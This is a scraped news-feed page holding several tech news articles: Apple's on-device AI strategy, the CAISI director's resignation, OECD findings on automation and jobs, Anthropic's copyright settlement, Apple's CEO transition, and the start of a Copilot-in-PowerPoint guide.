<p class="wp-block-paragraph">Critics can say it <a href="https://www.computerworld.com/article/4168225/wwdc-2026-how-apple-can-take-a-great-leap-in-ai.html">took Apple a long time</a> to get to this point, but they also seem to think the company has finally got the mix right with its series 27 operating systems. Arriving late to a party <a href="https://www.computerworld.com/article/4164979/apple-will-be-behind-on-ai-until-it-isnt.html">doesn’t mean you won’t shine once you get there</a>.</p>



<p class="wp-block-paragraph">Apple is also coming up the inside lane around frontier AI, with iterative OS and hardware enhancements that mean its devices become increasingly effective for <a href="https://www.computerworld.com/article/4016798/why-i-hope-apple-keeps-investing-in-on-device-ai.html">Edge AI use cases</a>, on device — no cloud service required.</p>



<p class="wp-block-paragraph">The company appears to be digging down into those use cases. Mark Gurman at Bloomberg recently predicted that <a href="https://www.tomshardware.com/tech-industry/semiconductors/apples-rumored-m7-ultra-targets-1-5tb-of-memory-and-blackwell-class-ai" target="_blank" rel="noreferrer noopener">future M7 Ultra Macs</a> will support as much as 1.5TB RAM, making these systems more than capable of running full weight frontier models in people’s offices, colleges, and homes. </p>



<p class="wp-block-paragraph">While that does assume the <a href="https://www.computerworld.com/article/4187825/the-trillion-dollar-ai-hallucination.html">AI-flationary memory market</a> can supply that much RAM at prices humans can afford, it is also true that people are already <a href="https://www.computerworld.com/article/4092162/apples-macos-ai-for-the-rest-of-us.html">running AI clusters</a> using off-the-shelf Mac minis networked over Thunderbolt cables. It’s no stretch to believe <a href="https://www.applemust.com/macweb-now-offers-mac-mini-cloud-clusters-in-east-coast-data-centre/" target="_blank" rel="noreferrer noopener">this will continue to be the case</a>, and that it will even broaden as the power/performance offered at the high end grows.</p>



<h2 class="wp-block-heading"><strong>What’s wrong with good enough?</strong></h2>



<p class="wp-block-paragraph">When combined with open AI stacks, particularly newly emerging varieties, Apple’s platforms should become leading contenders for <a href="https://www.computerworld.com/article/4074648/apples-big-bang-ai-moment-is-approaching.html">private AI services</a> and edge AI. Many business users will leap at the chance to offer their workers powerful, self-hosted, private AI services using one or more daisy-chained Mac Studios or Mac minis. The recent craze in deployment of both Macs to support <a href="https://openclaw.ai/" target="_blank" rel="noreferrer noopener">OpenClaw</a> instances shows they already are.</p>



<p class="wp-block-paragraph">Ultimately, these different slices of momentum mean I agree with <a href="https://podcastalpha.substack.com/p/all-in-can-ai-regulate-itself-stripe" target="_blank" rel="noreferrer noopener">investor Jason Calacanis</a> that Apple is in position to apply a great deal of pressure on OpenAI and Claude just by putting models on their devices. </p>



<p class="wp-block-paragraph">It’s also worth thinking about how people use AI today. How many of the queries made in the world right now constitute relatively simple tasks that could be transacted by on-device AI, such as the emerging new version of Apple Intelligence or even smaller LLM models running on device? You can even run <a href="https://9to5mac.com/2026/07/14/prismml-releases-bonsai-27b-claiming-first-major-ai-model-of-its-size-fit-for-iphone/" target="_blank" rel="noreferrer noopener">PrismML’s 1-bit, 27-billion parameter Bonsai</a> on an iPad using the Locally app, and that’s in the here and now.</p>



<p class="wp-block-paragraph">What happens? Pretty soon you’ll find people recognize that they can already run the vast majority of their AI-augmented workflows using services they <a href="https://www.applemust.com/morgan-stanley-its-when-not-if-apple-will-deliver-ai-on-the-edge/" target="_blank" rel="noreferrer noopener">have on their existing device</a> or can access on their on-prem Mac set-ups. And, of course, as people get used to running small tasks locally and larger tasks on premises, the actual space in which they need to turn to cloud-based frontier models <a href="https://www.computerworld.com/article/4195657/apple-is-prepping-for-life-after-the-ai-gold-rush.html">will erode</a>. That’s even as companies like PrismML work towards slimming down full-weight models so they don’t need to run on a server at all. </p>



<p class="wp-block-paragraph">“It’s going to be wild when people have unlimited tokens on their desks,” said Calacanis in a podcast round table discussion.</p>



<h2 class="wp-block-heading"><strong>Who has the most to lose?</strong></h2>



<p class="wp-block-paragraph">The current incarnations of AI felt like they came from nowhere. Most people weren’t aware of the technology until returning to work after the 2022 holiday season. Since then, the industry has proliferated with dozens of competing models, most recently including powerful but affordable frontier models such as Qwen and Kimi.ai.</p>



<p class="wp-block-paragraph">These models aren’t necessarily all as good as one another, but in many cases for much of what we do, we’ll find them to be good enough. That’s an existential crisis for some, as industry observers now think the inevitable pricing pressure means some services might have over-invested in capacity before finding any way to turn a profit.</p>



<p class="wp-block-paragraph">Those profit-seeking services are the ones with the most to lose as Apple extends its hardware advantage, democratizing AI access for all while providing platforms suitable for edge AI, on-premises AI, private AI, and even AI access using third-party services. (The need for the latter will shrink as the capabilities of the former get better.)</p>



<h2 class="wp-block-heading"><strong>Cupertino rising</strong></h2>



<p class="wp-block-paragraph">What does this all mean? While the industry remains young, it is already fragmenting. And striding through the dust of that process comes Apple, equipped with the hardware, software, and approach to build its business even as the enterprise of first mover AI services erodes. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to my daily Apple-related news summaries at <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[US AI testing institute chief steps down within three months]]></title>
<description><![CDATA[The head of the US government’s AI testing institute, Chris Fall, has resigned about three months after taking charge of the Center for AI Standards and Innovation (CAISI), the federal organization responsible for evaluating advanced artificial intelligence models for safety and security.



Curr...]]></description>
<link>https://tsecurity.de/de/3694777/ai-nachrichten/us-ai-testing-institute-chief-steps-down-within-three-months/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694777/ai-nachrichten/us-ai-testing-institute-chief-steps-down-within-three-months/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The head of the US government’s AI testing institute, Chris Fall, has resigned about three months after taking charge of the Center for AI Standards and Innovation (CAISI), the federal organization responsible for evaluating advanced artificial intelligence models for safety and security.</p>



<p class="wp-block-paragraph">Current National Institute of Standards and Technology NIST Director Arvind Raman will serve as acting CAISI Director following Fall’s departure while continuing to oversee the Commerce Department office responsible for the institute, the Daily Signal <a href="https://www.dailysignal.com/2026/07/20/scoop-head-of-federal-ai-safety-org-resigns/" target="_blank" rel="noreferrer noopener">reported</a>, citing two people familiar with the matter.</p>



<p class="wp-block-paragraph">A Commerce Department spokesperson who spoke to the publication did not disclose a reason for the resignation.</p>



<p class="wp-block-paragraph">Fall assumed leadership of CAISI in April after the Trump administration reorganized the former US AI Safety Institute under NIST. The institute develops methodologies for evaluating frontier AI models and works with AI developers on voluntary technical assessments covering areas such as cybersecurity, model misuse, reliability and other risks associated with increasingly capable AI systems.</p>



<p class="wp-block-paragraph">The leadership change comes as governments and AI companies continue developing technical approaches for evaluating frontier AI models while enterprises expand deployments of generative AI and agentic AI across business operations.</p>



<p class="wp-block-paragraph">In recent months, the Commerce Department has taken a <a href="https://www.infoworld.com/article/4194598/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion.html?_conv_v=vi:1*sc:1*cs:1784634320*fs:1784634320*pv:1*exp:%7B1004203305.%7Bv.1004477672-g.%7B%7D%7D%7D*seg:%7B%7D&amp;_conv_s=sh:1784634319808-0.24259838933788935*si:1*pv:1&amp;_conv_r=null&amp;_conv_sptest=null">more active role</a> in AI policy involving advanced models, placing greater attention on how the federal government evaluates technologies with potential national security implications.</p>



<h2 class="wp-block-heading">Continuity matters more than personalities</h2>



<p class="wp-block-paragraph">CAISI works with AI developers such as Anthropic, Google’s DeepMind and OpenAI on voluntary evaluations of frontier AI models and develops methodologies for testing model capabilities and risks. The institute does not regulate AI developers or certify commercial AI systems.</p>



<p class="wp-block-paragraph">For enterprises, those evaluations are one source of technical information alongside vendors’ own testing, third-party security assessments and internal AI governance programs.</p>



<p class="wp-block-paragraph">Sanchit Vir Gogia, chief analyst at Greyhound Research, said enterprises should focus less on the individual leading the institute and more on whether its technical work continues with the same level of consistency and transparency.</p>



<p class="wp-block-paragraph">“Leadership churn at CAISI weakens the signal long before it weakens the science,” Gogia said. “The testing has not stopped. Its authority simply does not travel as cleanly once the leadership does not.”</p>



<p class="wp-block-paragraph">According to Gogia, the more important question for enterprises is not whether the institute’s evaluation work will continue but whether the processes supporting those evaluations remain stable.</p>



<p class="wp-block-paragraph">“The instinct is to ask whether the pipeline is breaking,” he said. “The more useful question is where the pipeline now sits.”</p>



<h2 class="wp-block-heading">Enterprises still carry the burden of AI governance</h2>



<p class="wp-block-paragraph">Gogia said organizations should continue treating government-led AI evaluations as one input into their governance processes rather than as evidence that a model is inherently safe for enterprise deployment.</p>



<p class="wp-block-paragraph">“A government evaluation was always a signal, never a certificate,” he said. “A signal loses value the moment its issuer becomes unpredictable.”</p>



<p class="wp-block-paragraph">He said enterprises should instead monitor whether CAISI maintains consistent evaluation methodologies, continues publishing technical findings and preserves continuity within its research teams under interim leadership.</p>



<p class="wp-block-paragraph">“The name on the door is not the signal. The behaviour underneath it is,” Gogia said.</p>



<p class="wp-block-paragraph">Gogia also cautioned against linking Fall’s resignation to recent Commerce Department actions involving AI policy or export controls, noting that there is no public evidence connecting the two.</p>



<p class="wp-block-paragraph">“CAISI evaluates; it does not enforce export controls, because it holds no such power,” he said. “This is not a testing body reaching for enforcement. It is enforcement reaching past the testing body.”</p>



<p class="wp-block-paragraph">With Raman assuming the role on an interim basis, the next significant milestone for enterprises will be the appointment of a permanent director, and whether the institute’s evaluation programs continue without disruption, the analyst said.</p>



<p class="wp-block-paragraph">Gogia said the successor’s mandate may prove more important than the individual selected.</p>



<p class="wp-block-paragraph">“A CAISI result is not a safe harbour,” he said. “It informs an obligation; it does not discharge one.” NIST did not immediately respond to a request for comment.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OECD: Physical labor isn’t immune from AI disruptions]]></title>
<description><![CDATA[Jobs involving physical labor are at high risk of disruption from automation, with new technologies such as AI robots becoming more prevalent, according to a recent study by the Organization for Economic Co-operation and Development (OECD). That means workers in construction and extraction, farmi...]]></description>
<link>https://tsecurity.de/de/3694778/ai-nachrichten/oecd-physical-labor-isnt-immune-from-ai-disruptions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694778/ai-nachrichten/oecd-physical-labor-isnt-immune-from-ai-disruptions/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Jobs involving physical labor are at high risk of disruption from automation, with new technologies such as AI robots becoming more prevalent, <a href="https://www.oecd.org/en/publications/skills-in-the-ai-age_972bd15e-en.html" target="_blank" rel="noreferrer noopener">according to a recent study</a> by the Organization for Economic Co-operation and Development (OECD). That means workers in construction and extraction, farming, fishing, forestry, production and material transportation could be affected by fast-moving technology changes.</p>



<p class="wp-block-paragraph">“Routine and low-skilled jobs are at higher risk,” the Paris-based public policy group said, adding that “overall, jobs requiring non-routine cognitive, social and creative skills are less susceptible to automation.”</p>



<p class="wp-block-paragraph">The kinds of creative and cognitive jobs still thought to be less exposed to automation include social work and community service roles. </p>



<p class="wp-block-paragraph">OECD also said management jobs — which often require workers to devise creative answers to solve problems — fall within the creative and cognitive category. “While AI has made some high-skill job requirements more susceptible to automation, many critical skills in these roles remain difficult to automate,” OECD said.</p>



<p class="wp-block-paragraph">The same still holds true for some physical and manual labor jobs – including cleaners, agricultural workers, food-prep assistants, and laborers — which are less exposed to the affects of AI, OECD said.  </p>



<p class="wp-block-paragraph">But people who work in programming, translating and interpretation positions could find their work affected by the quick rise of AI tools and services. According to the organization, global AI uptake rose from 7% in 2021 to 20% in 2025.</p>



<p class="wp-block-paragraph">“In these occupations, GenAI could perform a significant share of tasks at least twice as fast today or in the near future,” OECD said.</p>



<p class="wp-block-paragraph">The effects of the AI boom are not always uniform across industries or regions. In a separate <a href="https://www.oecd.org/en/publications/oecd-employment-outlook-2026_7e710f54-en.html" target="_blank" rel="noreferrer noopener">2026 Employment Outlook study</a> released by the group, exposure to disruption from generative AI (genAI) ranges from about 16% in some areas to more than 70% elsewhere, depending on industries and occupations. </p>



<p class="wp-block-paragraph">Numerous research firms have said in recent years that <a href="https://www.computerworld.com/article/4151328/ai-threatens-jobs-that-can-be-unbundled-2.html">AI is driving short-term job losses</a>, though tech industry experts and analysts have argued AI will also create new careers and jobs as <a href="https://www.computerworld.com/article/4100257/mit-creates-an-ai-labor-index-as-agents-invade-human-economies.html">agentic AI takes over low-skilled work</a>. </p>



<p class="wp-block-paragraph">AI technology has become so ubiquitous that it’s been compared to electricity — virtually all companies will need it or at least know how to use it. But it’s adoption has been hindered at times as companies struggle to find ROI from its use, and by regulatory and ethical hurdles.</p>



<h2 class="wp-block-heading">In the US, AI blamed for June job losses</h2>



<p class="wp-block-paragraph">According to a <a href="https://www.challengergray.com/wp-content/uploads/2026/07/Challenger-Report-June2600986996.pdf" target="_blank" rel="noreferrer noopener">Challenger, Gray &amp; Christmas study</a> released earlier this month, AI was cited as the top reason for job cuts in June. The outplacement firm said employers cut 45,849 job cuts in June, of which 14,029 were attributed to AI, with the tech industry leading the cuts.</p>



<p class="wp-block-paragraph">“Tech remains the epicenter of this year’s cuts,” Challenger said. “AI is the dominant force as companies are restructuring around it, automating roles, and reallocating budgets toward new capabilities. The sector is being reshaped in real time.”</p>



<p class="wp-block-paragraph">Overall, AI has been responsible for 173,568 job cuts since 2021, the company said.</p>



<p class="wp-block-paragraph">AI is hurting jobs in customer service, internal reporting, telecommunications, and hosting automation, said Victor Janulaitis, a staffing consultant who was formerly CEO at Janco Associates Inc.</p>



<p class="wp-block-paragraph">“C-level executives continue to be focused on eliminating ‘non-essential’ managers, staff, and services,” he said. “Coders and developers have limited opportunities with legacy applications.”</p>



<p class="wp-block-paragraph">While jobs in the IT sector overall are declining, current hiring tends to skew in the direction of people with AI skills. A <a href="https://www.comptia.org/en/resources/research/tech-jobs-report/" target="_blank" rel="noreferrer noopener">report this month by CompTIA</a> put job listings with AI skills at around 500,000, which is close to double the number in January.</p>



<p class="wp-block-paragraph">“Employers in other industries are accelerating digital transformation initiatives and moving from AI experimentation to implementation,” said Seth Robinson, CompTIA’s vice president for industry research.</p>



<p class="wp-block-paragraph">That view dovetails with what ManpowerGroup, the recruitment firm, is seeing; demand for AI-related skills has nearly doubled over the past year, said Ger Doyle, regional president of North America at ManpowerGroup.</p>



<p class="wp-block-paragraph">That growth extends well beyond traditional technology roles as companies move from experimenting to AI deployments at scale, Doyle said. “We’re seeing it influence hiring across occupations ranging from data science and engineering to project management and operational roles,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic pays $1.5B to settle contentious copyright case]]></title>
<description><![CDATA[A US federal court has approved Anthropic’s $1.5 billion settlement in a class-action lawsuit in which authors accused the AI company of using their books without permission to train the AI model Claude. This is the largest such settlement to date in a US copyright case, according to Reuters.



...]]></description>
<link>https://tsecurity.de/de/3694775/ai-nachrichten/anthropic-pays-15b-to-settle-contentious-copyright-case/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694775/ai-nachrichten/anthropic-pays-15b-to-settle-contentious-copyright-case/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:11 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A US federal court has approved Anthropic’s $1.5 billion settlement in a class-action lawsuit in which authors <a href="https://www.computerworld.com/article/3489680/anthropic-sued-by-authors-over-alleged-misuse-of-copyrighted-works-for-ai-training.html" data-type="link" data-id="https://www.computerworld.com/article/3489680/anthropic-sued-by-authors-over-alleged-misuse-of-copyrighted-works-for-ai-training.html">accused the AI company of using their books without permission</a> to train the AI model Claude. This is the largest such settlement to date in a US copyright case, <a href="https://www.reuters.com/world/us-judge-approves-anthropics-15-billion-settlement-copyright-lawsuit-2026-07-20/" target="_blank" rel="noreferrer noopener">according to Reuters</a>.</p>



<p class="wp-block-paragraph">The dispute is one of several legal cases in which copyright holders sued AI companies over how large language models (LLMs) were trained, and it is the first major AI-related copyright dispute in the US to be resolved through a settlement.</p>



<p class="wp-block-paragraph">A judge had previously ruled that the actual training of AI models using books falls under the “fair use” doctrine in US copyright law. But Anthropic was found to have violated the law by storing more than 7 million pirated books in a central library, regardless of whether they were later used for AI training or not.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple and the changing of the guard]]></title>
<description><![CDATA[As Apple gears up to anoint John Ternus the new company CEO in September (while current leader Tim Cook takes a seat on the board) the company appears to be firing on all cylinders ahead of the leadership transition. 



What’s going well



Just look at the evidence: 




Apple is building marke...]]></description>
<link>https://tsecurity.de/de/3694776/ai-nachrichten/apple-and-the-changing-of-the-guard/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694776/ai-nachrichten/apple-and-the-changing-of-the-guard/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:11 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">As Apple gears up to <a href="https://www.computerworld.com/article/4161377/with-john-ternus-as-ceo-expect-apples-platforms-to-proliferate.html">anoint John Ternus</a> the new company CEO in September (while current leader Tim Cook <a href="https://www.apple.com/uk/newsroom/2026/04/tim-cook-to-become-apple-executive-chairman-john-ternus-to-become-apple-ceo/" target="_blank" rel="noreferrer noopener">takes a seat on the board</a>) the company appears to be firing on all cylinders ahead of the leadership transition. </p>



<h2 class="wp-block-heading"><strong>What’s going well</strong></h2>



<p class="wp-block-paragraph">Just look at the evidence: </p>



<ul class="wp-block-list">
<li>Apple is building market share across its entire product range; even memory-driven price inflation doesn’t seem to have dampened demand for its hardware yet.</li>



<li>While Apple had to raise prices, the company’s MacBook Neo remains seriously popular. It’s sitting atop <a href="https://www.amazon.com/Best-Sellers-Laptop-Computers/zgbs/electronics/565108" target="_blank" rel="noreferrer noopener">Amazon’s US best-selling chart</a>, which currently includes six Macs in the top 10. The Neo has <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html" target="_blank">topped this chart</a> since its introduction.</li>



<li>Apple’s iPhone 17 series continues to sell well, with recent market data showing sustained growth. Both <a href="https://counterpointresearch.com/en/insights/china-smartphone-shipments-slip-2-percent-yoy-in-q2-2026">Counterpoint</a> and <a href="https://www.applemust.com/apple-bucks-the-trend-in-china-with-iphone/">IDC</a> tell us that iPhone shipments continue to increase, even as other vendor shipments slide.</li>



<li>IDC analyst Francisco Jeronimo <a href="https://thecorenews.substack.com/p/the-core-appletldr-july-20">recently estimated</a> that Apple’s upcoming foldable iPhone Ultra could grab 29.4% of global folding smartphone sales this year, rising to 34.9% in 2027.</li>



<li>The company’s new <a href="https://www.computerworld.com/article/4188961/these-apple-os-betas-are-just-what-the-believers-wanted.html">27 series of operating systems</a> is attracting a great response as beta testers report that it is already solid, stable, and performing well.</li>



<li>The AI narrative has really changed, with analysts no longer <a href="https://www.computerworld.com/article/4198808/apple-could-run-the-table-on-ai-if-it-does-things-right.html">quite so starry-eyed</a> at the prospects for the big frontier AI firms. Apple’s edge-AI-enabling approach is winning converts.</li>
</ul>



<h2 class="wp-block-heading"><strong>What’s coming up</strong></h2>



<p class="wp-block-paragraph">The company’s <a href="https://www.computerworld.com/article/4198342/apple-widens-openai-trade-secrets-fight-with-preservation-orders.html">newly-filed lawsuit against OpenAI</a> may or may not succeed, but it will certainly help consolidate recognition of the importance of Apple’s designs and intellectual property in whatever hardware emerges from the AI firm. It also means both Apple and OpenAI are already competing in hardware, even though neither company yet offers anything that directly challenges the other. </p>



<p class="wp-block-paragraph">Apple has just set out its stall to brand-loyal fans in a big way and did so before OpenAI gets to woo the same set of customers with a wriggle of its <a href="https://www.computerworld.com/article/3992592/jony-ive-and-openai-plan-bicycles-for-21st-century-minds.html">Jony Ive-tinged talisman</a>.</p>



<p class="wp-block-paragraph">The stage is set for intense competition between the two. Though some say Apple’s needs to improve  employee retention, if it does find proof of efforts to use recruitment to engage in industrial espionage, it’ll be easier to represent its own products as being the OG for new hardware. </p>



<p class="wp-block-paragraph">If nothing else, it means consumers will forever be asking, “If OpenAI’s designers are so good, why did it need to poach them from Apple?” Doubt is a weapon.</p>



<h2 class="wp-block-heading"><strong>Managing perception</strong></h2>



<p class="wp-block-paragraph">It doesn’t matter how the case goes, because there fight is already affecting consumer psychology. It also means that as Ternus prepares to take his seat atop the rainbow-colored Apple throne, we can already size him up. “A man is measured by his enemies,” Joe Abercrombie wrote in “The Trouble With Peace.”</p>



<p class="wp-block-paragraph">Given the proximity of the leadership transition, it’s highly probable that Ternus signed-off on the litigation; in doing so he — and Apple — tell us to expect more of the same. </p>



<p class="wp-block-paragraph">Apple has, rightly or wrongly, decided that OpenAI will become its new existential bugbear, following in the footsteps of Microsoft Windows, Real Networks, Adobe Flash, Android, and Samsung, all of whom have been useful foils against which Apple has been able to build and maintain its identity.</p>



<p class="wp-block-paragraph">Looking at that list, you’d be tempted to believe that nothing much is new. Apple has often defined itself by the enemies it sometimes keeps. What has been will be again, which in this case means even as OpenAI attempts to carve out an identity as a hardware manufacturer delivering solutions to compete with Apple and Google, Ternus’ team’s looks to drive a consensus-shaped wedge into the pro-LLM propaganda. </p>



<p class="wp-block-paragraph">That blow comes as Apple <a href="https://www.computerworld.com/article/4198808/apple-could-run-the-table-on-ai-if-it-does-things-right.html">finally gets its act together around AI</a>, and as the company prepares for a future in which the world’s most-used wearable device also becomes the wearable way to woo Siri AI.</p>



<h2 class="wp-block-heading"><strong>My kingdom come</strong></h2>



<p class="wp-block-paragraph">Rising market share, powerful solutions, an increasingly recognized and respected approach to AI, and an ideological crusade — these details constitute Apple’s place today and are Tim Cook’s coronation gift to Ternus. He’s passing along a strong and hyper-profitable baton that screams of timeliness and relevance even as the company gets set, ready, to go with a year or two of new product designs, new product families, and a <a href="https://www.computerworld.com/article/4104139/the-stage-is-being-set-for-20-years-of-iphone.html">20<sup>th</sup>anniversary iPhone</a>.</p>



<p class="wp-block-paragraph">This is Apple’s party. OpenAI’s name didn’t make the list. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[10 cool things Copilot can do in PowerPoint]]></title>
<description><![CDATA[Building a presentation can take lots of time. There are design choices to figure out: the slide layouts, fonts, theme colors, and so on. You can use a template to skip this hassle, but you still have to paste your text and other content into the slides and edit it all so that the results are vis...]]></description>
<link>https://tsecurity.de/de/3694773/ai-nachrichten/10-cool-things-copilot-can-do-in-powerpoint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694773/ai-nachrichten/10-cool-things-copilot-can-do-in-powerpoint/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Building a presentation can take lots of time. There are design choices to figure out: the slide layouts, fonts, theme colors, and so on. You can use a template to skip this hassle, but you still have to paste your text and other content into the slides and edit it all so that the results are visually appealing.</p>



<p class="wp-block-paragraph">In PowerPoint, Microsoft’s Copilot AI assistant can now automate the heavy lifting of presentation creation. It can generate a first-draft presentation in minutes, then help you edit it. You can also prompt Copilot to help you quickly understand the contents of a presentation and glean insights from it. Use the tips in this guide to save oodles of time as you create and work with presentations.</p>



<h3 class="wp-block-heading">Who can use Copilot in PowerPoint</h3>



<p class="wp-block-paragraph">Individuals with a <a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing/individuals" target="_blank" rel="noreferrer noopener">Microsoft 365 Personal, Family, or Premium</a> subscription have access to Copilot from within PowerPoint and other Microsoft 365 apps. Users with a Premium plan have <a href="https://support.microsoft.com/en-US/Microsoft-365-Copilot/ai-credits-and-limits-for-microsoft-365-subscriptions" target="_blank" rel="noreferrer noopener">higher Copilot usage allowances</a> and access to advanced AI features.</p>



<p class="wp-block-paragraph">For business users, it’s more complicated. Organizations with more than 2,000 users must pay for <a href="https://www.computerworld.com/article/1629974/m365-copilot-microsofts-generative-ai-tool-explained.html">Microsoft 365 Copilot</a> licenses for their users in addition to their regular Microsoft 365 licenses. Users at organizations with fewer than 2,000 users can use Copilot within M365 apps even without the M365 Copilot add-on licenses, but there are <a href="https://support.microsoft.com/en-us/microsoft-365-copilot/how-copilot-chat-works-with-and-without-a-microsoft-365-copilot-license" target="_blank" rel="noreferrer noopener">limitations</a> in usage, speed, and feature availability.</p>



<p class="wp-block-paragraph">To see what kind of access you have, log in to Microsoft’s <a href="https://m365.cloud.microsoft/" target="_blank" rel="noreferrer noopener">Copilot Chat web hub</a> and look for your name in the lower left corner. If you see “M365 Copilot (Premium)” under your name, you can use Copilot in M365 apps with priority access and advanced features. “M365 Copilot (Basic)” means you can use Copilot in M365 apps with lower-priority access and limited features. If you see “Copilot Chat (Basic)” or nothing below your name, you can’t use Copilot in M365 apps.</p>



<p class="wp-block-paragraph"><em>(Copilot Chat Basic users do get some Copilot functionality, including the ability to generate presentations, via the Copilot Chat hub. See our <a href="https://www.computerworld.com/article/4171293/copilot-chat-your-hub-for-document-creation-and-analysis.html">Copilot Chat tutorial</a> for details.)</em></p>



<h4 class="wp-block-heading"><strong>In this article:</strong></h4>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#sidebar">Working with Copilot in PowerPoint</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#template">Create a presentation template</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#pres-from-doc">Create a presentation from a document</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#slide-from-doc">Add content from a document to a slide</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#refine-text">Refine your slide text</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#image">Find or create an image</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#expand">Expand your presentation with relevant slides</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#summarize">Summarize a presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#answer-questions">Answer questions about a presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#navigate">Help you navigate a large presentation</a></li>



<li><a href="https://www.computerworld.com/article/4194634/10-cool-things-copilot-can-do-in-powerpoint.html#speaker-notes">Generate speaker notes and/or an FAQ</a></li>
</ul>



<h2 class="wp-block-heading">Working with Copilot in PowerPoint</h2>



<p class="wp-block-paragraph">First, let’s quickly go over the notable settings of the Copilot sidebar.</p>



<p class="wp-block-paragraph">When you have a presentation open in PowerPoint, click the Copilot icon; it may be floating at the lower-right corner of your PowerPoint window or parked at the right end of the Ribbon toolbar. The Copilot sidebar will open along the right of the page. You’ll type your prompts to Copilot inside the chat window in this pane.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/copilot-in-powerpoint-01-sidebar.png?w=1024" alt="powerpoint screen with copilot sidebar open on right" class="wp-image-4195065" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>The sidebar on the right is where you interact with Copilot in PowerPOint.</p><br></figcaption></figure><p class="imageCredit">Howard Wen / Foundry</p></div>



